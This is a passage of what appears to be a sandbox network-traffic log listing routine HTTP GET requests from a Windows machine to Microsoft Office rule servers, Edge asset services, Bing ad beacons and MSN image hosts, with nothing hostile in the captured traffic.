t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239340418546_1PNT9LCA42P8D0DO5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8XpvYC-MBe0myEW6golJ_GDVUCUzVUqO7VAJu9k0LBvkUqkHqdYJDcTC3jvhADekXoV1AdFCf6FWbwraZckO4X8KpUINfxMM6txy5g60n1_Xow0LVYxFcNhSn3nqBUO-NGPs93RXdr4_5VVdstCsS4tkONacY8_sX13I8LFEF-MRfG4dc%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3Dad9f3ed314431d35042e599265d1724f&TIME=20241123T060928Z&CID=531538185&EID=531538185&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8XpvYC-MBe0myEW6golJ_GDVUCUzVUqO7VAJu9k0LBvkUqkHqdYJDcTC3jvhADekXoV1AdFCf6FWbwraZckO4X8KpUINfxMM6txy5g60n1_Xow0LVYxFcNhSn3nqBUO-NGPs93RXdr4_5VVdstCsS4tkONacY8_sX13I8LFEF-MRfG4dc%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3Dad9f3ed314431d35042e599265d1724f&TIME=20241123T060929Z&CID=531538185&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=11842F2995276B2636F13A6994556AB9; _EDGE_S=SID=0F11C281283966371C7FD7C129216766; MR=0
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732946980&P2=404&P3=2&P4=cz4ApeZwqIPGRcS0Kaip5Qa4hDXmOEgDAshSQDxo4TY8ImPCefQtx3scwb012JTPTQw5hOsEhxx45xk1jp2tgA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: mHkrbEd1Ei6/QLAg+uTnjFSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msySq.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1553f9fbcf8eec5bf09da821732342189; XID=1553f9fbcf8eec5bf09da821732342189
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
